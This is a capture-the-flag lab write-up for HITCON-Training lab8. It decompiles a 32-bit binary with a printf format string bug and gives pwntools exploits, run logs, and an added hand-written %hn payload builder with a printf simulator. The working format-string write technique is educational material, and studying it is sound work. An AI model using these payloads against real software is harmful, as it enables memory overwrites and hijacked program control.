[HITCON-Training] lab8
cg10036
2019. 11. 18. 08:17
Summary
32bit
format string bug
Analysis
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[0x100];  // [esp+Ch] [ebp-10Ch]; IDA shows this as `char buf;`, the 0x100 bytes between esp+0xC and the canary
  unsigned int v5;  // [esp+10Ch] [ebp-Ch]  stack canary

  v5 = __readgsdword(0x14u);
  setvbuf(_bss_start, 0, 2, 0);          // stdout unbuffered (IDA resolved the stdout symbol as _bss_start)
  puts("Please crax me !");
  printf("Give me magic :");
  read(0, &buf, 0x100u);                 // at most 0x100 bytes, so there is no stack overflow here
  printf(&buf);                          // format string bug: user input is used as the format string
  if ( magic == 218 )                    // 0xda; `magic` is a global, at a fixed address because the binary is not PIE
  {
    system("cat /home/craxme/flag");
  }
  else if ( magic == -87117812 )         // 0xfaceb00c interpreted as a signed 32-bit int
  {
    system("cat /home/craxme/craxflag");
  }
  else
  {
    puts("You need be a phd");
  }
  return 0;
}
The format string bug is in the line that echoes the input: `printf(&buf)` passes user-controlled data directly as the format string, so `%x` leaks stack contents and `%n`-family conversions write to whatever address sits in the chosen argument slot.
Exploit
from pwn import *

e = ELF("./craxme")
p = process("./craxme")

# Offset 7: the first 4 bytes of buf land in printf's 7th vararg slot, so the
# addresses fmtstr_payload places at the start of the payload are reachable as %7$n, %8$n, ...
# 218 (0xda) gets flag; -87117812 (0xfaceb00c as a signed 32-bit int) gets craxflag.
#payload = fmtstr_payload(7, {e.symbols["magic"] : 218})
payload = fmtstr_payload(7, {e.symbols["magic"] : -87117812})
p.send(payload)
p.interactive()
cg10036@cg10036-virtual-machine:~/HITCON-Training/LAB/lab8$ p ex.py
[*] '/home/cg10036/HITCON-Training/LAB/lab8/craxme'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Starting local process './craxme': pid 3447
[*] Switching to interactive mode
Please crax me !
Give me magic :8\xa0\x09\xa0\x0:\xa0\x0;\xa0\x0 \x9c \x00 \x00 \x00[*] Process './craxme' stopped with exit code 0 (pid 3447)
cat: /home/craxme/craxflag: No such file or directory
from pwn import *

e = ELF("./craxme")
p = process("./craxme")

# Same write, this time with 218 (0xda) so the first branch runs `cat /home/craxme/flag`.
payload = fmtstr_payload(7, {e.symbols["magic"] : 218})
#payload = fmtstr_payload(7, {e.symbols["magic"] : -87117812})
p.send(payload)
p.interactive()
cg10036@cg10036-virtual-machine:~/HITCON-Training/LAB/lab8$ p ex.py
[*] '/home/cg10036/HITCON-Training/LAB/lab8/craxme'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Starting local process './craxme': pid 3461
[*] Switching to interactive mode
Please crax me !
Give me magic :8\xa0\x09\xa0\x0:\xa0\x0;\xa0\x0 | \x00 [*] Process './craxme' stopped with exit code 0 (pid 3461)
cat: /home/craxme/flag: No such file or directory
All that is needed is to overwrite `magic` with the format string bug. `%n`-style conversions store the number of bytes printed so far at the address found in the corresponding argument slot, and because the binary is not PIE the address of the global `magic` (`e.symbols["magic"]`) is fixed. `buf` starts at printf's 7th vararg slot, which is why `fmtstr_payload` is given offset 7; you can confirm the offset by sending `AAAA%7$x` and checking that `41414141` is echoed back. In both runs above `system("cat ...")` was reached, the flag files simply do not exist on the local machine.
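To show what `fmtstr_payload` is doing under the hood, here is an added example that is not part of the original post and not pwntools' own code: a hand-rolled 32-bit builder that writes one value with two `%hn` stores (pwntools defaults to byte-sized `%hhn` writes, the idea is the same), plus a minimal printf emulator so the payload can be checked offline without the binary. `MAGIC_ADDR` is an assumed placeholder for the address of `magic`; a real exploit takes it from `e.symbols["magic"]`. The argument offset 7 and the 0x100-byte input cap are taken from the page.

```python
import re
import struct

# Assumed placeholder for the address of the global `magic`; in the real exploit
# use e.symbols["magic"] (the binary is not PIE, so the address is fixed).
MAGIC_ADDR = 0x0804A038


def build_fmt_write(offset, addr, value, written=0):
    """Format string that stores the 32-bit `value` at `addr` using two %hn writes.

    offset  : first printf vararg slot that overlaps our input buffer (7 for craxme)
    written : bytes printf already emitted before our string (0 for printf(&buf))
    Layout: [addr][addr+2] followed by "%<pad>c%<slot>$hn" directives. Addresses go
    first, so they must contain neither NUL (ends the format) nor '%' bytes.
    """
    for a in (addr, addr + 2):
        if b"\x00" in struct.pack("<I", a) or b"%" in struct.pack("<I", a):
            raise ValueError("address bytes would break the format; place addresses last instead")
    payload = struct.pack("<I", addr) + struct.pack("<I", addr + 2)
    written += len(payload)
    lo, hi = value & 0xFFFF, (value >> 16) & 0xFFFF   # works for negative ints too
    fmt = b""
    # Write the smaller half first so each padding step stays small; %hn stores only
    # the low 16 bits of the counter, so padding is computed modulo 0x10000.
    for target, slot in sorted([(lo, offset), (hi, offset + 1)]):
        pad = (target - written) % 0x10000
        if pad:
            fmt += b"%%%dc" % pad            # print `pad` more characters
        fmt += b"%%%d$hn" % slot             # store low 16 bits of the counter at slot's address
        written += pad
    return payload + fmt


DIRECTIVE = re.compile(rb"%(?:(?P<width>\d+)c|(?P<slot>\d+)\$(?P<conv>hn|n))")


def simulate_printf(fmt, slots):
    """Tiny printf model: counts output bytes and records %n / %hn stores.

    slots[i] is the 4-byte value printf would fetch as vararg i+1 (%7$hn -> slots[6]).
    Positional arguments are absolute, so %Nc consuming a sequential arg is ignored here.
    Returns (bytes_printed, {addr: stored_value}).
    """
    count, pos, mem = 0, 0, {}
    for m in DIRECTIVE.finditer(fmt):
        count += m.start() - pos             # literal bytes copied to the output
        pos = m.end()
        if m.group("width") is not None:
            count += int(m.group("width"))   # %Nc prints exactly N characters
        else:
            addr = slots[int(m.group("slot")) - 1]
            mask = 0xFFFF if m.group("conv") == b"hn" else 0xFFFFFFFF
            mem[addr] = count & mask
    count += len(fmt) - pos
    return count, mem


def stack_slots(payload, offset):
    """Model craxme's stack: slots 1..offset-1 hold unrelated values, slot `offset`
    onward are the 4-byte words of our own input buffer (constructed model)."""
    words = [struct.unpack("<I", payload[i:i + 4])[0]
             for i in range(0, len(payload) - len(payload) % 4, 4)]
    return [0xDEADBEEF] * (offset - 1) + words


def read_u32(mem, addr):
    """Reassemble the two 16-bit halves stored at addr and addr+2."""
    return mem.get(addr, 0) | (mem.get(addr + 2, 0) << 16)


def magic_after_exploit(value, offset=7, addr=MAGIC_ADDR):
    """Build the payload, run it through the model, return what `magic` would hold."""
    payload = build_fmt_write(offset, addr, value)
    if len(payload) > 0x100:                 # read(0, buf, 0x100) caps our input
        raise ValueError("payload does not fit in the 0x100-byte read")
    _, mem = simulate_printf(payload, stack_slots(payload, offset))
    return read_u32(mem, addr)


if __name__ == "__main__":
    for v in (218, -87117812):
        print(hex(v & 0xFFFFFFFF), "->", hex(magic_after_exploit(v)))
```

The two `%hn` stores keep the padding below 64K bytes each, which is why the format text itself stays short enough for the 0x100-byte `read` even though printf ends up emitting tens of kilobytes; that flood of spaces is the garbled echo visible in the terminal output above.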